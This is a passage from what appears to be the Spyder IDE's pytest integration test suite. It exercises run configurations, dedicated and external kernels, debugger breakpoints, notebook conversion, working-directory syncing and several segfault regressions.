qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!list")
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
shell.pdb_execute("!exit")
qtbot.wait(500)
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are still on debugging
try:
assert shell.is_waiting_pdb_input()
except Exception:
print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
from spyder.plugins.run.widgets import RunConfiguration
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
from spyder.plugins.run.widgets import RunConfiguration
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.get_focus_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.filenames == ['', test_file]
assert main_window.ipyconsole.tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole._create_client_for_kernel(kc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
python_shell = shell
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole._create_client_for_kernel(spykc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Test runfile in external_kernel
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"print(2 + 1)"
)
# Start running
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
assert "runfile" in shell._control.toPlainText()
assert "3" in shell._control.toPlainText()
# Try quitting the kernels
shell.execute('quit()')
python_shell.execute('quit()')
qtbot.wait(1000)
# Make sure everything quit properly
assert km.kernel.poll() is not None
assert spykm.kernel.poll() is not None
if spykm._restarter:
assert spykm._restarter.poll() is not None
if km._restarter:
assert km._restarter.poll() is not None
# Close the channels
spykc.stop_channels()
kc.stop_channels()
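# A minimal, standalone sketch (not used by the test above) of how a generic,
# non-Spyder kernel can be started with jupyter_client directly. The
# start_new_kernel() helper used above is assumed to wrap a similar call;
# this version is illustrative only.
def _start_generic_kernel_sketch():
    from jupyter_client.manager import start_new_kernel as jc_start_new_kernel

    # Returns a (KernelManager, KernelClient) pair with the channels started.
    km, kc = jc_start_new_kernel()
    try:
        # Run a statement in the external kernel and wait for its shell reply.
        msg_id = kc.execute('a = 10')
        reply = kc.get_shell_msg(timeout=10)
        assert reply['parent_header']['msg_id'] == msg_id
    finally:
        # Mirror the cleanup done at the end of the test above.
        kc.stop_channels()
        km.shutdown_kernel(now=True)
    return reply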
@pytest.mark.first
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.fileexplorer.treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
LooseVersion(ipy_release.version) == LooseVersion('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Copy a test notebook into the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.explorer.treewidget.get_index('notebook.ipynb')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the notebook was opened
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.explorer.treewidget.convert_notebook(osp.join(project_dir, 'notebook.ipynb'))
# Assert the converted script was opened
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
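# A minimal sketch of the notebook-to-script conversion that
# convert_notebook() above is assumed to perform under the hood, using
# nbconvert's public PythonExporter API. Illustrative only; Spyder's real
# implementation may differ in details such as encoding handling.
def _convert_notebook_sketch(notebook_path, script_path):
    from nbconvert import PythonExporter

    exporter = PythonExporter()
    # from_filename() returns the exported source plus a resources dict.
    script_text, _resources = exporter.from_filename(notebook_path)
    with open(script_path, 'w') as fh:
        fh.write(script_text)
    return script_text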
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Copy a test script into the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.explorer.treewidget.get_index('script.py')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the file was opened
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.explorer.treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that the breakpoint was set
shell.pdb_execute("!b")
qtbot.wait(500)
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
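# A minimal sketch of the breakpoint bookkeeping checked above with "!b",
# using the standard-library pdb/bdb machinery that IPython's debugger builds
# on. Illustrative only; the test drives Spyder's pdb_execute() wrapper and
# the editor gutter instead.
def _breakpoint_listing_sketch(filename):
    import pdb

    debugger = pdb.Pdb()
    # set_break() registers a breakpoint much like the editor gutter does
    # through toogle_breakpoint(line_number=6) above.
    debugger.set_break(filename, 6)
    # get_all_breaks() maps filenames to the line numbers with breakpoints,
    # which is the information the "b" command prints.
    return debugger.get_all_breaks()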
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run cell and advance ----
# Run the cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('CI', None) is None or PYQT5,
reason="It times out sometimes on Windows, it's not "
"meant to be run outside of a CI and it segfaults "
"too frequently in PyQt5")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait to make sure there is no segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif((os.name == 'nt' or
os.environ.get('CI', None) is not None and PYQT_VERSION >= '5.9'),
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still open.
3. Close that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait to make sure there is no segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: The errors for this test don't appear to be related to it; they
show up later on because they are generated by an async C++
RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
# Verify that n works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
# Verify that the debugger doesn't step into sitecustomize.py with next
# and stops the debugging session.
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Assert that the prompt appears
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
